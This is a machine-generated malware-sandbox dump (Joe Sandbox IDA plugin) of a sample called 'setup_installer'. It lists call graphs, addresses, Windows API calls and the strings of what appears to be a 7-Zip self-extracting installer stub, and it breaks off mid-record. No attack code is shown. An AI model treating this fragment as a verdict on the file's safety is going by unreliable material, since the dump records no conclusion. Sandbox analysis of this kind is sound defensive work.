14569->14571 14572 40e966 _CxxThrowException 14569->14572 14614 410138 14570->14614 14583 40fe8a 14571->14583 14572->14571 14575 410a9b 14576 410da8 free 14575->14576 14576->14562 14578 40e966 _CxxThrowException 14579 410aaa 14578->14579 14580 40ea46 _CxxThrowException 14579->14580 14581 410ac8 14580->14581 14581->14570 14582 40e966 _CxxThrowException 14581->14582 14582->14570 14584 40fe94 __EH_prolog 14583->14584 14679 40fc2a 14584->14679 14586 41003a 14588 40dc5d free 14586->14588 14589 410069 14588->14589 14710 403204 free 14589->14710 14590 4100a6 _CxxThrowException 14592 4100ba 14590->14592 14596 40dc5d free 14592->14596 14593 410071 14711 403204 free 14593->14711 14594 407ab8 3 API calls 14612 40fef1 14594->14612 14598 4100d7 14596->14598 14597 410079 14712 403204 free 14597->14712 14736 403204 free 14598->14736 14599 4031dd 2 API calls 14599->14612 14602 410081 14713 40df15 14602->14713 14603 4100df 14737 403204 free 14603->14737 14606 410093 14606->14575 14606->14578 14606->14579 14607 4100e7 14738 403204 free 14607->14738 14608 40bd85 27 API calls 14608->14612 14610 4100ef 14611 40df15 free 14610->14611 14611->14606 14612->14586 14612->14590 14612->14592 14612->14594 14612->14599 14612->14608 14613 40e966 _CxxThrowException 14612->14613 14705 410d82 14612->14705 14613->14612 14615 410142 __EH_prolog 14614->14615 14616 40ea46 _CxxThrowException 14615->14616 14617 410155 14616->14617 14618 41017d 14617->14618 14941 40ee0f 14617->14941 14621 40fe8a 42 API calls 14618->14621 14623 4101ee 14618->14623 14625 4101ba 14621->14625 14622 40ea46 _CxxThrowException 14622->14618 14624 410266 14623->14624 14630 40fc2a 19 API calls 14623->14630 14626 4106f1 14624->14626 14635 40eb3d 2 API calls 14624->14635 14627 4101c1 14625->14627 14628 4101d5 14625->14628 14965 410785 14626->14965 14632 410da8 free 14627->14632 14629 40ea46 _CxxThrowException 14628->14629 14629->14623 14633 41024d 14630->14633 14636 4101cd 14632->14636 14638 40ea46 _CxxThrowException 14633->14638 14637 410289 14635->14637 14636->14575 14639 408f50 4 API calls 14637->14639 14638->14624 14640 41029d 14639->14640 14642 408f50 4 API calls 14640->14642 14644 4102a8 14642->14644 14643 410720 14973 403204 free 14643->14973 14649 408f50 4 API calls 14644->14649 14676 4102c2 14644->14676 14646 41072b 14974 403204 free 14646->14974 14648 410733 14650 410da8 free 14648->14650 14649->14676 14650->14636 14651 40ea46 _CxxThrowException 14651->14676 14652 41058c 14653 40ea46 _CxxThrowException 14652->14653 14654 410591 14653->14654 14655 4105a2 _CxxThrowException 14654->14655 14657 4105b6 14654->14657 14655->14657 14656 4105dd 14956 410e34 14656->14956 14657->14656 14658 408b28 3 API calls 14657->14658 14658->14656 14661 40fd9a 4 API calls 14661->14676 14662 40fd4c malloc _CxxThrowException free _CxxThrowException 14662->14676 14663 4106dd 14963 403204 free 14663->14963 14666 40e9b4 _CxxThrowException 14666->14676 14667 40e913 _CxxThrowException _CxxThrowException 14667->14676 14668 407ab8 3 API calls 14668->14676 14669 4106e5 14964 403204 free 14669->14964 14670 40e9d2 2 API calls 14670->14676 14672 40f19a 4 API calls 14672->14676 14673 408f50 4 API calls 14673->14676 14675 410d2e 3 API calls 14675->14676 14676->14651 14676->14652 14676->14661 14676->14662 14676->14666 14676->14667 14676->14668 14676->14670 14676->14672 14676->14673 14676->14675 14677 40e966 _CxxThrowException 14676->14677 14946 40fdf2 14676->14946 14677->14676 14678->14565 14680 40ea46 _CxxThrowException 14679->14680 14681 40fc3c 14680->14681 14684 40ea46 _CxxThrowException 14681->14684 14685 40fc6e 14681->14685 14682 40fc93 14683 40fcb1 14682->14683 14806 410d01 14682->14806 14687 40fce1 14683->14687 14693 40fcc6 14683->14693 14686 40fc56 14684->14686 14685->14682 14755 40f30e 14685->14755 14739 40f20b 14686->14739 14838 410d2e 14687->14838 14811 40f891 14693->14811 14694 40ea46 _CxxThrowException 14694->14682 14697 40ea46 _CxxThrowException 14697->14685 14698 40fcd4 14701 40ea46 _CxxThrowException 14698->14701 14699 40fcee 14700 40fcdc 14699->14700 14843 408f50 14699->14843 14702 40fd26 14700->14702 14704 40e966 _CxxThrowException 14700->14704 14701->14700 14702->14612 14704->14702 14706 4031dd 2 API calls 14705->14706 14707 410d8d 14706->14707 14708 4088fd 4 API calls 14707->14708 14709 410da3 14708->14709 14709->14612 14710->14593 14711->14597 14712->14602 14930 403204 free 14713->14930 14715 40df20 14931 403204 free 14715->14931 14717 40df28 14932 403204 free 14717->14932 14719 40df30 14933 403204 free 14719->14933 14721 40df38 14934 403204 free 14721->14934 14723 40df40 14935 403204 free 14723->14935 14725 40df48 14936 403204 free 14725->14936 14727 40df50 14937 403204 free 14727->14937 14729 40df58 14938 403204 free 14729->14938 14731 40df60 14939 403204 free 14731->14939 14733 40df68 14940 403204 free 14733->14940 14735 40df70 14735->14606 14736->14603 14737->14607 14738->14610 14740 40f215 __EH_prolog 14739->14740 14741 40eb3d 2 API calls 14740->14741 14742 40f225 14741->14742 14846 40f16c 14742->14846 14745 410d01 3 API calls 14748 40f243 14745->14748 14746 40ea46 _CxxThrowException 14746->14748 14747 40ea46 _CxxThrowException 14754 40f292 14747->14754 14748->14746 14750 40e966 _CxxThrowException 14748->14750 14748->14754 14749 40f2fd 14749->14697 14750->14748 14753 403204 free ctype 14753->14754 14754->14747 14754->14749 14754->14753 14852 40f1ec 14754->14852 14857 40ea33 14754->14857 14756 40f318 __EH_prolog 14755->14756 14757 40f16c _CxxThrowException 14756->14757 14758 40f32a 14757->14758 14759 40eb3d 2 API calls 14758->14759 14760 40f332 14759->14760 14888 40e913 14760->14888 14762 40f34f 14763 410d2e 3 API calls 14762->14763 14764 40f36d 14763->14764 14898 410d5b 14764->14898 14767 410d2e 3 API calls 14768 40f385 14767->14768 14769 410d2e 3 API calls 14768->14769 14804 40f392 14769->14804 14770 40f6bd 14771 407ab8 3 API calls 14770->14771 14773 40f6fa 14771->14773 14772 40eb3d _CxxThrowException _CxxThrowException 14772->14804 14774 40f70d 14773->14774 14775 40f6fe memcpy 14773->14775 14907 403204 free 14774->14907 14775->14774 14777 40f85a _CxxThrowException 14783 40f75f 14777->14783 14778 40f715 14908 403204 free 14778->14908 14779 40ea33 _CxxThrowException 14779->14783 14781 40f71d 14787 40f16c _CxxThrowException 14781->14787 14782 40e9b4 _CxxThrowException 14782->14804 14783->14779 14784 40ea46 _CxxThrowException 14783->14784 14790 40f87b 14783->14790 14801 40f1ec 4 API calls 14783->14801 14784->14783 14785 40f7f6 _CxxThrowException 14789 40f80a _CxxThrowException 14785->14789 14786 40f792 _CxxThrowException 14788 40f7a6 _CxxThrowException 14786->14788 14791 40f737 14787->14791 14792 40f7ba _CxxThrowException 14788->14792 14793 40f81e _CxxThrowException 14789->14793 14790->14694 14795 410d01 3 API calls 14791->14795 14796 40f7ce _CxxThrowException 14792->14796 14797 40f832 _CxxThrowException 14793->14797 14794 407ece malloc _CxxThrowException free 14794->14804 14799 40f742 14795->14799 14800 40f7e2 _CxxThrowException 14796->14800 14798 40f846 _CxxThrowException 14797->14798 14798->14777 14799->14783 14803 40ea46 _CxxThrowException 14799->14803 14800->14785 14801->14783 14803->14799 14804->14770 14804->14772 14804->14777 14804->14782 14804->14785 14804->14786 14804->14788 14804->14789 14804->14792 14804->14793 14804->14794 14804->14796 14804->14797 14804->14798 14804->14800 14805 40e966 _CxxThrowException 14804->14805 14903 410b9e 14804->14903 14805->14804 14922 403204 free 14806->14922 14808 410d0b 14809 4031dd 2 API calls 14808->14809 14810 410d27 14809->14810 14810->14683 14812 40f89b __EH_prolog 14811->14812 14813 410d2e 3 API calls 14812->14813 14816 40f8b6 14813->14816 14814 40ea46 _CxxThrowException 14814->14816 14815 40f922 14823 40fa00 14815->14823 14824 40f933 14815->14824 14816->14814 14816->14815 14817 40eb3d 2 API calls 14816->14817 14818 40ea33 _CxxThrowException 14816->14818 14816->14824 14817->14816 14818->14816 14819 40f9f0 14820 40ea46 _CxxThrowException 14819->14820 14836 40f9f8 14820->14836 14821 40fb7c 14828 40fc06 3 API calls 14821->14828 14833 40fb8f 14821->14833 14822 40e966 _CxxThrowException 14822->14823 14823->14822 14825 408f50 4 API calls 14823->14825 14823->14836 14824->14819 14826 40ea46 _CxxThrowException 14824->14826 14830 408f50 malloc _CxxThrowException free memcpy 14824->14830 14835 40e966 _CxxThrowException 14824->14835 14825->14823 14826->14824 14827 40ea33 _CxxThrowException 14827->14836 14828->14833 14829 40fd9a 4 API calls 14829->14836 14830->14824 14831 40ea46 _CxxThrowException 14831->14836 14833->14698 14833->14833 14835->14824 14836->14821 14836->14827 14836->14829 14836->14831 14837 40eb67 _CxxThrowException 14836->14837 14923 40fc06 14836->14923 14928 403204 free 14836->14928 14837->14836 14929 403204 free 14838->14929 14840 410d38 14841 4031dd 2 API calls 14840->14841 14842 410d54 14841->14842 14842->14699 14844 408f79 4 API calls 14843->14844 14845 408f58 14844->14845 14845->14699 14848 40f16f 14846->14848 14847 40ea46 _CxxThrowException 14847->14848 14848->14847 14849 40f196 14848->14849 14850 40e966 _CxxThrowException 14848->14850 14851 40ea33 _CxxThrowException 14848->14851 14849->14745 14850->14848 14851->14848 14862 40fd9a 14852->14862 14858 40ea46 _CxxThrowException 14857->14858 14859 40ea3b 14858->14859 14884 40ea08 14859->14884 14863 40e9b4 _CxxThrowException 14862->14863 14864 40fda6 14863->14864 14865 40fdaa 14864->14865 14866 40fdbb 14864->14866 14875 40fd4c 14865->14875 14867 408b28 3 API calls 14866->14867 14869 40f1fc 14867->14869 14870 40f19a 14869->14870 14871 40891e 3 API calls 14870->14871 14873 40f1b5 14871->14873 14872 40f1e5 14872->14754 14873->14872 14880 40eb67 14873->14880 14876 408b28 3 API calls 14875->14876 14879 40fd64 14876->14879 14877 40fd93 14877->14869 14878 40e9b4 _CxxThrowException 14878->14879 14879->14877 14879->14878 14881 40eb75 14880->14881 14882 40eb7a 14880->14882 14883 40e966 _CxxThrowException 14881->14883 14882->14873 14883->14882 14885 40ea20 14884->14885 14886 40ea2b 14884->14886 14885->14886 14887 40e966 _CxxThrowException 14885->14887 14886->14754 14887->14886 14889 40e920 14888->14889 14890 40e9b4 _CxxThrowException 14889->14890 14891 40e92b 14890->14891 14892 40e951 14891->14892 14893 40e93d 14891->14893 14894 40e966 _CxxThrowException 14891->14894 14892->14762 14895 40eb3d 2 API calls 14893->14895 14894->14893 14896 40e945 14895->14896 14896->14892 14897 40e966 _CxxThrowException 14896->14897 14897->14892 14909 403204 free 14898->14909 14900 410d65 14901 4031dd 2 API calls 14900->14901 14902 40f378 14901->14902 14902->14767 14906 410bb1 14903->14906 14905 410bef 14905->14804 14906->14905 14910 410de8 14906->14910 14907->14778 14908->14781 14909->14900 14913 408f79 14910->14913 14914 408f84 14913->14914 14920 408fc3 memmove 14913->14920 14915 4031dd 2 API calls 14914->14915 14916 408fa3 14915->14916 14917 408fbc 14916->14917 14918 408fad memcpy 14916->14918 14921 403204 free 14917->14921 14918->14917 14920->14905 14921->14920 14922->14808 14924 408b28 3 API calls 14923->14924 14925 40fc14 14924->14925 14926 40891e 3 API calls 14925->14926 14927 40fc22 14926->14927 14927->14836 14928->14836 14929->14840 14930->14715 14931->14717 14932->14719 14933->14721 14934->14723 14935->14725 14936->14727 14937->14729 14938->14731 14939->14733 14940->14735 14944 40ee12 14941->14944 14942 40ea46 _CxxThrowException 14942->14944 14943 40ee28 14943->14622 14944->14942 14944->14943 14945 40ea33 _CxxThrowException 14944->14945 14945->14944 14947 40fdfc __EH_prolog 14946->14947 14948 40fd9a 4 API calls 14947->14948 14949 40fe12 14948->14949 14950 40e913 2 API calls 14949->14950 14951 40fe2c 14950->14951 14952 40d12d 3 API calls 14951->14952 14953 40fe37 14952->14953 14954 40fe6d 14953->14954 14975 40eb8a 14953->14975 14954->14676 14957 410e45 14956->14957 14958 4105f0 14956->14958 14979 403204 free 14957->14979 14962 403204 free 14958->14962 14960 410e4c 14961 4031dd 2 API calls 14960->14961 14961->14958 14962->14663 14963->14669 14964->14626 14966 410d2e 3 API calls 14965->14966 14967 41079e 14966->14967 14968 410d2e 3 API calls 14967->14968 14970 4107ac 14968->14970 14969 4106fb 14972 403204 free 14969->14972 14970->14969 14971 40e966 _CxxThrowException 14970->14971 14971->14970 14972->14643 14973->14646 14974->14648 14976 40eb98 14975->14976 14977 40eb9d 14975->14977 14978 40e966 _CxxThrowException 14976->14978 14977->14953 14978->14977 14979->14960 14980 413870 14981 413874 free 14980->14981 14982 41387f 14980->14982 14981->14982 14983 4137d0 14984 4137d4 14983->14984 14985 4137d7 malloc 14983->14985 14986 4137f0 free 14987 4131f0 14988 41320b 14987->14988 14989 413222 14988->14989 14991 4131b0 14988->14991 14992 4131ba 14991->14992 14996 4131d8 14992->14996 14997 413780 free 14992->14997 14994 4131c9 14998 413760 14994->14998 14996->14989 14997->14994 14999 413764 14998->14999 15000 413767 malloc 14998->15000 14999->14996 15000->14996 15001 4066d6 15006 4066f2 15001->15006 15005 4066eb 15007 4066fc __EH_prolog 15006->15007 15008 405298 ctype FindCloseChangeNotification 15007->15008 15009 4066de 15008->15009 15009->15005 15010 403204 free 15009->15010 15010->15005 15011 40dddb 15012 40dde8 15011->15012 15013 40ddf9 15011->15013 15012->15013 15017 40de00 15012->15017 15018 40de0a __EH_prolog 15017->15018 15022 40de3e 15018->15022 15021 403204 free 15021->15013 15031 403204 free 15022->15031 15024 40de4c 15032 403204 free 15024->15032 15026 40de57 15033 403204 free 15026->15033 15028 40de62 15034 40de6e 15028->15034 15031->15024 15032->15026 15033->15028 15065 403204 free 15034->15065 15036 40de7d 15066 403204 free 15036->15066 15038 40de88 15067 403204 free 15038->15067 15040 40de93 15068 403204 free 15040->15068 15042 40dea4 15069 403204 free 15042->15069 15044 40deab 15070 403204 free 15044->15070 15046 40debc 15071 403204 free 15046->15071 15048 40dec3 15072 403204 free 15048->15072 15050 40ded4 15073 403204 free 15050->15073 15052 40dedb 15074 403204 free 15052->15074 15054 40dee9 15075 403204 free 15054->15075 15056 40def0 15076 403204 free 15056->15076 15058 40def8 15077 403204 free 15058->15077 15060 40df00 15078 403204 free 15060->15078 15062 40df08 15063 40df15 free 15062->15063 15064 40ddf3 15063->15064 15064->15021 15065->15036 15066->15038 15067->15040 15068->15042 15069->15044 15070->15046 15071->15048 15072->15050 15073->15052 15074->15054 15075->15056 15076->15058 15077->15060 15078->15062 15079 407bfe 15082 407c03 15079->15082 15081 407c21 15082->15081 15083 418ac0 2 API calls 15082->15083 15085 418a70 WaitForSingleObject 15082->15085 15086 40810e 15082->15086 15083->15082 15085->15082 15087 408118 __EH_prolog 15086->15087 15088 40814d 3 API calls 15087->15088 15089 40812e 15088->15089 15089->15082
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0040BD8A
                                          • Part of subcall function 0040F0A2: _CxxThrowException.MSVCRT(?,0041C760), ref: 0040F0EB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: ExceptionH_prologThrow
                                        • String ID:
                                        • API String ID: 461045715-3916222277
                                        • Opcode ID: c1b8519deddaafef617f9fc7011b9fc81cf2af7ee97f803bbd860e78a6795cb0
                                        • Instruction ID: 9dd891245016f0e6c4d5ed255e412f020d35e1d655fa0f2a31f40bb369a830a0
                                        • Opcode Fuzzy Hash: c1b8519deddaafef617f9fc7011b9fc81cf2af7ee97f803bbd860e78a6795cb0
                                        • Instruction Fuzzy Hash: 91827E31900259DFDB14DFA4C884BAEBBB0BF05314F2442AEE815BB2D2D778AD45CB59
                                        APIs
                                          • Part of subcall function 00404B27: FindClose.KERNELBASE(00000000,000000FF,00404B58), ref: 00404B32
                                        • FindFirstFileW.KERNELBASE(?,?), ref: 00404B66
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: Find$CloseFileFirst
                                        • String ID:
                                        • API String ID: 2295610775-0
                                        • Opcode ID: 71d3481ca684b1bef4711d28faad769efb473fbe63790087f208eb28159082e8
                                        • Instruction ID: 8d5b1ebed930f7aebe848b96ddff61a25dc6a55b7fd75e971453d958bc1fd6fb
                                        • Opcode Fuzzy Hash: 71d3481ca684b1bef4711d28faad769efb473fbe63790087f208eb28159082e8
                                        • Instruction Fuzzy Hash: D7E092B000010456CF20AF24CC45AEA37BCAF91328F1041BAA960772D0DB38F94ACB9C

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 401014-40102f call 401951 3 401031-40103d call 40b77a 0->3 4 401042-4010ce call 4143e0 call 40368d * 4 GetCommandLineW call 4036b0 call 403000 call 403204 call 40368d call 4042c1 call 403afe call 403ab3 call 403270 0->4 9 4017fe-401801 3->9 35 4010d0-4010ee call 40376e call 403afe call 403ab3 4->35 36 4010f3-40111c call 4033ad call 4019f5 4->36 11 4018c3-4018c7 9->11 35->36 45 401137-401162 call 4036f3 call 40368d 36->45 46 40111e-401121 36->46 58 401337-401352 call 40368d call 404a40 45->58 59 401168-401180 call 40e83c call 403c57 45->59 48 401123-40112a call 40b77a 46->48 49 40112f-401132 46->49 48->49 52 401885-4018be call 403204 * 6 49->52 106 4018c1 52->106 74 401354-401357 58->74 75 40136d-401377 call 4031dd 58->75 76 401182-401185 59->76 77 40119b-4011e0 call 403f77 * 3 call 4032ce 59->77 83 401365-401368 74->83 84 401359-401360 call 40b77a 74->84 93 401384 75->93 94 401379-401382 call 401987 75->94 78 401193-401196 76->78 79 401187-40118e call 40b77a 76->79 128 4011e2 77->128 129 4011e8-4011f7 call 403f46 77->129 88 40124e-4012a5 call 401c64 call 403204 * 8 78->88 79->78 87 40185f-401882 call 404ace call 403204 * 3 83->87 84->83 87->52 88->106 102 401386-401388 93->102 94->102 108 401390-401399 call 40930e 102->108 109 40138a-40138c 102->109 106->11 122 40139b-4013a7 call 40b77a 108->122 123 4013ac-4013e4 call 403740 call 40368d call 4024db 108->123 109->108 135 4014a8-4014aa 122->135 157 401462-401492 call 403204 call 40368d call 404834 call 404826 123->157 158 4013e6-4013e9 123->158 128->129 139 4011f9-401209 call 4037d2 129->139 140 40120e-401211 129->140 135->83 141 4014b0-4014b6 135->141 139->140 145 401217-40121a 140->145 146 4012aa-401332 call 403f77 call 4037d2 call 403204 call 403f77 call 4037d2 call 403204 call 403f77 call 4037d2 call 403204 * 4 call 401c64 140->146 141->83 145->146 151 401220-40122e MessageBoxW 145->151 146->58 151->146 155 401230-40124b call 403204 * 3 151->155 155->88 213 401494-4014a7 call 4018ca call 403204 157->213 214 4014bb-4014be 157->214 163 4013eb-4013ee 158->163 164 40144c-40145d call 403204 * 2 158->164 169 4013f0-4013f3 163->169 170 4013f5-401400 call 405fad 163->170 194 401794-401797 164->194 169->170 176 401405-40140a 169->176 170->176 176->164 179 40140c-40140f 176->179 186 401411-40142c call 404319 call 4037d2 call 403204 179->186 187 40142d-40144b call 405e4f MessageBoxW call 403204 179->187 186->187 187->164 203 401799-40179b 194->203 204 40179f-4017fb call 404ace call 403204 * 9 194->204 203->204 204->9 213->135 217 4014c4-4014fc call 403740 214->217 218 40161a-40161d 214->218 237 401512-401557 call 403740 ShellExecuteExW 217->237 238 4014fe-40150d call 403944 call 40399c 217->238 224 401652-4016ca call 403740 call 4055bc call 4036b0 call 403b7d call 403204 * 2 call 403740 call 4036b0 call 403b7d call 403204 218->224 225 40161f-401636 call 40376e call 405155 218->225 332 4016e0-401759 call 403632 call 403740 call 403204 CreateProcessW 224->332 333 4016cc-4016db call 40393c call 40399c 224->333 225->224 258 401638-40163b 225->258 259 401604-401615 call 403204 237->259 260 40155d-401560 237->260 238->237 267 401781-40178f call 4018ca call 403204 258->267 268 401641-40164d call 40b77a 258->268 279 401826-40182f call 403204 259->279 261 401562-401569 call 40b77a 260->261 262 40156e-401596 call 403204 * 2 call 4018ca call 403204 260->262 261->262 315 401598-40159a 262->315 316 40159e-4015ff call 404ace call 403204 * 9 262->316 267->194 268->267 297 401841-401847 call 4018ca 279->297 298 401831-40183b WaitForSingleObject CloseHandle 279->298 308 40184c-401857 call 403204 297->308 298->297 308->87 319 401859-40185b 308->319 315->316 316->11 319->87 350 401806-401823 CloseHandle call 403204 332->350 351 40175f-401762 332->351 333->332 350->279 352 401764-401767 call 401bae 351->352 353 40176c-401780 call 403204 * 2 351->353 352->353 353->267
                                        APIs
                                          • Part of subcall function 00401951: GetVersionExW.KERNEL32(?), ref: 0040196B
                                        • GetCommandLineW.KERNEL32(?,?,00000000), ref: 0040106A
                                          • Part of subcall function 0040B77A: MessageBoxW.USER32(00000000,?,7-Zip,00000010), ref: 0040B783
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: CommandLineMessageVersion
                                        • String ID: $%%T$%%T\$;!@Install@!UTF-8!$;!@InstallEnd@!$<$BeginPrompt$Can not create temp folder archive$Can not find setup.exe$Can not load codecs$Can not open file$Can't load config info$Config failed$D$Directory$Progress$RunProgram$Title$Unsupported Windows version$setup.exe
                                        • API String ID: 1181637900-2745836148
                                        • Opcode ID: a0069bc1b76d23120d7a9335fb8639b802b751fe182a55a2f7d8ebf9f1ac61d4
                                        • Instruction ID: 78f7f2e9f043a6e6e6b7956f289dc4eafbfd083bebb4df73e2f95e0f672d6238
                                        • Opcode Fuzzy Hash: a0069bc1b76d23120d7a9335fb8639b802b751fe182a55a2f7d8ebf9f1ac61d4
                                        • Instruction Fuzzy Hash: 6F320971800119AACF15BFA2CC52AEDBF39AF04319F1084BFE515761E2DB395A89CF58

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 368 41910c-419181 __set_app_type __p__fmode __p__commode call 419297 371 419183-41918e __setusermatherr 368->371 372 41918f-4191e6 call 419282 _initterm __getmainargs _initterm 368->372 371->372 375 419222-419225 372->375 376 4191e8-4191f0 372->376 377 419227-41922b 375->377 378 4191ff-419203 375->378 379 4191f2-4191f4 376->379 380 4191f6-4191f9 376->380 377->375 382 419205-419207 378->382 383 419209-41921a GetStartupInfoA 378->383 379->376 379->380 380->378 381 4191fb-4191fc 380->381 381->378 382->381 382->383 384 41922d-41922f 383->384 385 41921c-419220 383->385 386 419230-41925d GetModuleHandleA call 401014 exit _XcptFilter 384->386 385->386
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                        • String ID:
                                        • API String ID: 801014965-0
                                        • Opcode ID: 953566137ff324d2cc08c920b6bee47bf00e17c29684309f18a3ad35c9c7aab9
                                        • Instruction ID: 00b1766c458623f5937beb69801fb3c22a2eab9a989783d6d676752ba79aceb1
                                        • Opcode Fuzzy Hash: 953566137ff324d2cc08c920b6bee47bf00e17c29684309f18a3ad35c9c7aab9
                                        • Instruction Fuzzy Hash: 7041AD71940358BFDB24CFA4DC99AEA7BB8EB09710F20456FE852933A1D7384C81CB58

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 389 40492e-40495d GetCurrentThreadId GetTickCount GetCurrentProcessId 390 404961-40496d call 40376e 389->390 393 4049c0-4049c6 390->393 394 40496f-404971 390->394 395 4049d4-4049dd call 4051ae 393->395 396 4049c8-4049cf call 4039d8 393->396 397 404973-40497e 394->397 404 4049ec-4049f1 395->404 405 4049df-4049ea SetLastError 395->405 396->395 400 404980-404983 397->400 401 404985 397->401 403 404988-404990 400->403 401->403 403->397 406 404992-40499b 403->406 408 4049f3-4049fd call 405489 404->408 409 4049ff-404a01 call 40447d 404->409 407 404a1c-404a23 405->407 410 4049a6-4049b9 call 4039d8 GetTickCount 406->410 411 40499d-4049a1 call 401ef8 406->411 407->390 414 404a29-404a33 407->414 417 404a06-404a08 408->417 409->417 423 4049bb-4049bd 410->423 424 4049be 410->424 411->410 419 404a35-404a39 414->419 421 404a0a-404a13 GetLastError 417->421 422 404a3c-404a3e 417->422 421->407 425 404a15-404a1a 421->425 422->419 423->424 424->393 425->407 425->414
                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 0040493C
                                        • GetTickCount.KERNEL32 ref: 00404947
                                        • GetCurrentProcessId.KERNEL32(?,00000000,00404A99,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000), ref: 00404952
                                        • GetTickCount.KERNEL32 ref: 004049B1
                                        • SetLastError.KERNEL32(000000B7,00000000,?,00000000,00404A99,?,00000000), ref: 004049E4
                                        • GetLastError.KERNEL32(00000000,?,00000000,00404A99,?,00000000), ref: 00404A0A
                                          • Part of subcall function 0040447D: CreateDirectoryW.KERNELBASE(00000000,00000000,00404A06,00000000,?,00000000,00404A99,?,00000000), ref: 00404480
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: CountCurrentErrorLastTick$CreateDirectoryProcessThread
                                        • String ID: .tmp$d
                                        • API String ID: 3074393274-2797371523
                                        • Opcode ID: f19ce56c7826e0bf107473bc8c697ce6a70b0feafaf69e5a630db6a82c9332e3
                                        • Instruction ID: 18cd839078860563eabca9c9166aecfd8bb13a7da93ccbaeff0eff10b9c7e743
                                        • Opcode Fuzzy Hash: f19ce56c7826e0bf107473bc8c697ce6a70b0feafaf69e5a630db6a82c9332e3
                                        • Instruction Fuzzy Hash: D331EDF2A402049BDB14ABB4D84A7AF7B65ABD1319F14413BEA42B72C1D73C8C418B99

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 426 406018-40604b GetModuleHandleW GetProcAddress 427 406078-40608f GlobalMemoryStatus 426->427 428 40604d-406055 GlobalMemoryStatusEx 426->428 430 406091 427->430 431 406094-406096 427->431 428->427 429 406057-406060 428->429 433 406062 429->433 434 40606e 429->434 430->431 432 40609a-40609e 431->432 435 406064-406067 433->435 436 406069-40606c 433->436 437 406071-406076 434->437 435->434 435->436 436->437 437->432
                                        APIs
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 0040603C
                                        • GetProcAddress.KERNEL32(00000000), ref: 00406043
                                        • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00406051
                                        • GlobalMemoryStatus.KERNEL32(?), ref: 00406083
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
